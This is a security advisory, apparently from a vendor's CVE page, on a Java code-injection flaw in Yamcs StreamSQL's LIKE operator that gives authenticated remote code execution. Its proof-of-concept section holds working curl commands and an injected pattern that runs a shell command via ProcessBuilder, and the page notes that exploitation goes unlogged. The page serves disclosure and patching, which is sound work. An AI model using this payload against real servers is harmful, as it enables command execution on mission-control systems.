CVE-2026-55565 is a critical-severity (CVSS 9.9) Code Injection vulnerability in org.yamcs:yamcs-core. O3 Security confirms whether CVE-2026-55565 is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.
Yamcs vulnerable to authenticated remote code execution via unescaped StreamSQL `LIKE` pattern compiled by Janino (`LikeExpression`)
Real-World Exposure
org.yamcs:yamcs-core☕org.yamcs:yamcs-coreReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Maven packages — download data is not available via public APIs for these ecosystems.
Description
Summary
Yamcs compiles StreamSQL query expressions to Java at runtime with Janino. The LIKE operator inserts the user-supplied pattern into the generated Java unescaped, inside a "..." literal, so a pattern containing " breaks out and injects arbitrary Java (e.g. a static{} block that runs an OS command when the compiled filter class loads). Result: RCE as the OS user running Yamcs.
The pattern is embedded raw whether it comes from a SQL string literal or a bound ? argument, so the sink is reachable from any endpoint that builds a LIKE from user input, at routine read-only privileges, not just executeSql:
POST /api/archive/{instance}:executeSqland:streamSql(privilegeControlArchiving)POST /api/archive/{instance}/tables/{table}:readRowsvia thequeryfield (privilegeReadTables)GET /api/archive/{instance}/events?q=and the event export/stream variants (privilegeReadEvents)listActivitiesq(privilegeReadActivities)
The Events page search box feeds q directly.
Independent of the May-2026 algorithm-override RCEs (CVE-2026-46562/46621/44632): it needs none of ChangeMissionDatabase and is not affected by the overrideAlgorithmsEnabled gate.
Details
- Sink:
Expression#getCompiledExpressioncompiles generated source withSimpleCompiler.cook(...)(Expression.java:205) and instantiates it (Expression.java:213) at stream prep, before any tuple flows. - Injection:
LikeExpression#fillCode_getValueReturn(LikeExpression.java:26) appendslikeClause.patternraw intoUtils.like(<col>, "<pattern>"). The safe siblingValueExpressionescapes literals viaescapeJavaString()(ValueExpression.java:82-85); a review of all 35 streamsql code-generators foundLikeExpressionto be the only unescaped one. - Grammar:
S_STRING = "'" (~["'"])* "'"(StreamSql.jj:222) allows";getNonEscapedString(StreamSql.jj:36) does not escape"or\. - Reachability:
TableApi#executeSql(TableApi.java:399) checks onlyControlArchiving, then passes the raw statement toydb.createStatement(...). No SecurityManager or Janino sandbox is configured, so the compiled code can callRuntime/ProcessBuilder.:streamSql(TableApi.java:447) is equally affected. - The sink is reachable from several lower-privilege endpoints, not just
executeSql. A LIKE pattern is embedded raw whether it comes from a SQL literal or a bound?argument (nextArgAsString->likeClause.pattern), so any endpoint building... LIKE ?with attacker input also reaches it:POST .../tables/{table}:readRows(TableApi.java:276, privilege ReadTables): thequeryandcolsrequest fields are concatenated raw into the executed StreamSQL (sqlb.where(request.getQuery())). Verified RCE.GET .../events?q=(listEvents, EventsApi.java:79/109) and exportEvents/streamEvents (EventsApi.java:290/344), privilege ReadEvents:body.message like ?with"%"+q+"%". Verified RCE.listActivities(ActivitiesApi.java:86/113), privilege ReadActivities:detail like ?with"%"+q+"%".ReadTables/ReadEvents/ReadActivitiesare routine read-only permissions. The singleescapeJavaStringfix below closes all of these (one sink). The rawreadRowsWHERE/cols concatenation is an additional StreamSQL-injection that should be fixed independently (validatecols, do not accept a free-formqueryatReadTables).
Proof of Concept
Against a Yamcs server with security enabled (default HTTP port 8090), as a user holding only ControlArchiving.
BASE=http://<host>:8090
INSTANCE=<instance>
# 1. Get a token for a ControlArchiving user.
TOK=$(curl -s -X POST "$BASE/auth/token" \
-d 'grant_type=password&username=USER&password=PASS' \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["access_token"])')
# 2. Create a table with a string column.
curl -s -X POST "$BASE/api/archive/$INSTANCE:executeSql" \
-H "Authorization: Bearer $TOK" -H 'Content-Type: application/json' \
-d '{"statement":"create table demo(gentime timestamp, y string, primary key(gentime))"}'
# 3. Inject the LIKE pattern. It closes the generated Java string and method, adds a
# static{} initializer that runs an OS command, then reopens a dummy method so the
# generated class still compiles.
PATTERN='a"); } static { try { new ProcessBuilder(new String[]{"/bin/sh","-c","id > /tmp/pwned"}).start().waitFor(); } catch (Exception e) {} } public Object dummy() { return Integer.valueOf("1'
SQL="create stream pwn as select * from demo where y like '$PATTERN'"
curl -s -X POST "$BASE/api/archive/$INSTANCE:executeSql" \
-H "Authorization: Bearer $TOK" -H 'Content-Type: application/json' \
-d "$(python3 -c 'import sys,json;print(json.dumps({"statement":sys.argv[1]}))' "$SQL")"
# 4. Proof: the command ran as the Yamcs OS user (on the server host).
cat /tmp/pwned # -> uid=...(...)
A benign like 'abc%' does nothing; exploitation depends on the " break-out.
Impact
Arbitrary OS command execution as the Yamcs user: telecommand injection/suppression, telemetry tampering, filesystem and credential/key access, lateral movement, persistence. The attacker needs only a read-only archive privilege, not an MDB/archive-control role: the sink is reachable via executeSql (ControlArchiving), readRows (ReadTables), the events list/export/stream endpoints (ReadEvents), and the activities listing (ReadActivities).
Exploitation via executeSql generates no Yamcs event and is not audit-logged (the created table/stream persist and the request may appear in an HTTP access log).
Remediation
Escape the pattern like other literals, in LikeExpression.fillCode_getValueReturn:
code.append(", \"");
ValueExpression.escapeJavaString(likeClause.pattern, code); // was: code.append(likeClause.pattern);
code.append("\")");
Defence-in-depth: pass the pattern as a bound argument instead of inlining it; audit every cook() path; compile generated classes under a classloader that cannot reach Runtime/ProcessBuilder.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| ☕Maven | org.yamcs:yamcs-core | ≥ 5.13.0&&< 5.13.2 | 5.13.2 |
| ☕Maven | org.yamcs:yamcs-core | all versions | 5.12.8 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for org.yamcs:yamcs-core. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update org.yamcs:yamcs-core to 5.13.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-55565 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether CVE-2026-55565 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to CVE-2026-55565. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is CVE-2026-55565 in your dependencies?
O3 detects CVE-2026-55565 across Maven dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.